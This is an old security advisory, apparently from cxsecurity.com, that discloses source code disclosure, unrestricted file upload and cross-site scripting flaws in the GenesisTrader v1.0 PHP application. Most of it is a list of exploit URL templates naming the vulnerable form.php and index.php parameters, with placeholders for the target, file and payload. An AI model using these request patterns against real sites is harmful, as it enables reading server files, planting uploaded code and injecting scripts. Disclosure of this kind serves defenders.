GenesisTrader v1.0 - Multiple Vulnerabilities

2006.12.15
Credit: Mr_KaLiMaN
Risk: High
Local: No
Remote: Yes
CWE: N/A

GenesisTrader v1.0 ------------------ Vendor site: http://www.genesis-php.com/ Product: GenesisTrader v1.0 Vulnerability: Source Code Disclosure, Arbitrary File Upload & XSS Credits: Mr_KaLiMaN Reported to Vendor: 06/12/06 Public disclosure: 14/12/06 Description: ------------ Source Code Disclosure:(No need to be registered) http://[victim]/[path]/form.php?floap=modfich&do=[FILE] http://[victim]/[path]/form.php?floap=modfich&chem=[FILE] Arbitrary File Upload:(NEED to be registered) http://[victim]/[path]/form.php?floap=ajoutfich form.php -> upload.php (all type and extensions allowed) XSS:(No need to be registered) http://[victim]/[path]/index.php?cuve=[XSS] http://[victim]/[path]/form.php?floap=ajoutfich&cuve=[XSS] http://[victim]/[path]/form.php?floap=modfich&chem=[XSS] http://[victim]/[path]/form.php?floap=modfich&do=[XSS] http://[victim]/[path]/form.php?floap=rename&chem=[XSS] http://[victim]/[path]/form.php?floap=rename&do=[XSS] http://[victim]/[path]/form.php?floap=copy&chem=[XSS] http://[victim]/[path]/form.php?floap=copy&do=[XSS] http://[victim]/[path]/form.php?floap=chmod&chem=[XSS] http://[victim]/[path]/form.php?floap=chmod&do=[XSS] etc... in form.php?floap=...


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top